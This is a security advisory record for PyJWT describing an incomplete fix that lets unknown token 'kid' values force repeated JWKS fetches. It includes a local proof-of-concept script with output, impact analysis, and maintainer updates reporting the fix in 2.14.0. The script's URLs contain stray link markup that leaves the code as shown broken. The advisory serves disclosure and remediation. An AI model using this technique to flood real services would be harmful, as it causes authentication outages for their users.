{"id":"GHSA-2gx3-rcp4-g85q","summary":"PyJWT: PyJWKClient still amplifies unauthenticated JWKS fetches on unknown kid values (incomplete fix of CVE-2026-48524)","details":"Summary\nCVE-2026-48524 (GHSA-fhv5-28vv-h8m8, \"PyJWKClient unbounded JWKS endpoint requests via attacker-controlled kid values (DoS)\") was fixed in 2.13.0 by stopping fetch_data() from clearing the cache on a fetch error. That closed one amplification path but did not add the mitigation the advisory's title implies: there is still no rate-limit, negative-cache, or minimum-refresh-interval for unknown kids.\n\nAt HEAD, get_signing_key(kid) (jwt/jwks_client.py:185-211), on any unknown kid, calls get_signing_keys(refresh=True), and refresh=True bypasses jwk_set_cache unconditionally and forces a fresh fetch_data(). The kid is read from the unverified token header (get_signing_key_from_jwt decodes with verify_signature=False), so no valid token and no authentication is required. lru_cache does not cache the raised exception, so even the same unknown kid repeated re-fetches on every call.\n\nAffected\npyjwt \u003c= 2.13.0 (the latest release; the patched release for CVE-2026-48524). No fixed version yet.\n\nProof of concept (verified on 2.13.0, cache enabled = realistic prod config)\nimport threading, http.server, socketserver, json\nfrom jwt import PyJWKClient\nhits = {'n': 0}\nJWKS = json.dumps({\"keys\":[{\"kty\":\"oct\",\"kid\":\"real\",\"k\":\"AAAA\"}]}).encode()\nclass H(http.server.BaseHTTPRequestHandler):\n    def do_GET(self):\n        hits['n'] += 1\n        self.send_response(200); self.send_header('Content-Type','application/json'); self.end_headers()\n        self.wfile.write(JWKS)\n    def log_message(self,*a): pass\nsrv = socketserver.TCPServer(('[127.0.0.1](https://127.0.0.1/)',0), H); port = srv.server_address[1]\nthreading.Thread(target=srv.serve_forever, daemon=True).start()\nc = PyJWKClient(f'http://127.0.0.1/:{port}[/jwks](tg://bot_command?command=jwks).json', cache_keys=True, lifespan=3600)\nfor i in range(8):\n    try: c.get_signing_key(f'attacker-unknown-kid-{i}')\n    except Exception: pass\nbefore = hits['n']\nfor _ in range(5):\n    try: c.get_signing_key('same-unknown')\n    except Exception: pass\nprint('distinct unknown kids: 8 -\u003e fetches:', hits['n'])\nprint('same unknown kid x5 -\u003e extra fetches:', hits['n'] - before)\n\nOutput:\n  distinct unknown kids: 8 -\u003e fetches: 9\n  same unknown kid x5 -\u003e extra fetches: 5\nEach unknown kid forces a fresh JWKS fetch; a repeated identical unknown kid still re-fetches every time against an unexpired cache. No rate-limit or negative-cache.\n\nImpact\nOne unauthenticated request -\u003e one outbound JWKS HTTP fetch + full JSON parse on the victim server. An attacker floods tokens carrying junk kids, so the victim hammers its own JWKS/IdP endpoint (amplification: attacker -\u003e victim -\u003e IdP), exhausting victim CPU/sockets and potentially tripping the JWKS provider's rate-limit, causing an application-wide auth outage. This is the unauthenticated DoS the parent advisory is named for, still reachable after the 2.13.0 fix.\n\nSuggested fix\nGuard the forced refresh on unknown kids: negative-cache unknown kids for a short TTL, or enforce a minimum interval between forced JWKS refreshes, so a repeated or unknown kid cannot force unbounded fetches.\n\nNote: the same-kid-repeated result (5 identical unknown kids producing 5 fetches against an unexpired cache) shows this is request amplification, not legitimate key-rotation handling, since that refresh can never succeed.\n\nReported by Babakizo (Securva).\n\n## Maintainer update — 2026-09-10\n\nThe maintainer confirmed the reported behavior against PyJWT 2.13.0. With JWKS caching\nenabled, an unknown `kid` previously forced an unconditional JWKS refresh,\nincluding when the same unknown value was repeated while the cached key set was\nstill valid. This allowed unauthenticated token headers to cause unnecessary\noutbound JWKS requests and repeated parsing work.\n\nThe fix is now on `master` in commit `ba4853a`. `PyJWKClient` now applies a\n30-second cooldown after successful JWKS fetches before permitting another\nunknown-`kid` refresh, serializes concurrent refresh decisions per client, and\nallows callers to configure or disable the cooldown. Cache-disabled behavior\nand immediate retry after failed fetches remain unchanged.\n\nRegression tests cover repeated unknown kids, cooldown expiry, concurrent\nmisses, cache-disabled operation, and invalid cooldown values. The available\nfull tox matrix, Ruff, and mypy checks pass. The fix will be included in the\nnext released 2.x version.\n\n## Maintainer update — 2026-09-11\n\nThe verified fix for this advisory is included in PyJWT 2.14.0, released on 2026-09-11 and available on PyPI. PyJWT 2.14.0 is the first release containing the fix. This advisory is now published with 2.14.0 recorded as the patched version.","aliases":["CVE-2026-101917","PYSEC-2026-4140"],"modified":"2026-10-01T17:55:32.854393215Z","published":"2026-09-29T23:11:51Z","database_specific":{"github_reviewed_at":"2026-09-29T23:11:51Z","nvd_published_at":"2026-09-28T21:17:13Z","cwe_ids":["CWE-770"],"severity":"MODERATE","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-2gx3-rcp4-g85q"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-101917"},{"type":"WEB","url":"https://github.com/jpadilla/pyjwt/commit/ba4853a75fb9676362da17f67d0f64bd18afd4e1"},{"type":"PACKAGE","url":"https://github.com/jpadilla/pyjwt"},{"type":"WEB","url":"https://github.com/jpadilla/pyjwt/releases/tag/2.14.0"}],"affected":[{"package":{"name":"pyjwt","ecosystem":"PyPI","purl":"pkg:pypi/pyjwt"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"2.14.0"}]}],"versions":["0.1.1","0.1.2","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.1.8","0.1.9","0.2.0","0.2.1","0.2.3","0.3.0","0.3.1","0.3.2","0.4.0","0.4.1","0.4.2","0.4.3","1.0.0","1.0.1","1.1.0","1.3.0","1.4.0","1.4.1","1.4.2","1.5.0","1.5.1","1.5.2","1.5.3","1.6.0","1.6.1","1.6.3","1.6.4","1.7.0","1.7.1","2.0.0","2.0.0a1","2.0.0a2","2.0.1","2.1.0","2.10.0","2.10.1","2.11.0","2.12.0","2.12.1","2.13.0","2.2.0","2.3.0","2.4.0","2.5.0","2.6.0","2.7.0","2.8.0","2.9.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-2gx3-rcp4-g85q/GHSA-2gx3-rcp4-g85q.json","last_known_affected_version_range":"\u003c= 2.13.0"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}]}